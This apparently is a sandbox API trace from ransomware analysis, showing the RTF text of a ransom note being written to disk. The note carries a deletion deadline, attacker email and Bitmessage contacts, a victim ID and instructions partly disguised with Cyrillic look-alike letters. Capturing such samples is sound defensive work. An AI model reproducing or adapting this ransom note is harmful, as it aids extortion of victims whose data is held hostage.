g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.221] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.221] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2462808, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.221] WriteFile (in: hFile=0x2d4, lpBuffer=0x2462808*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 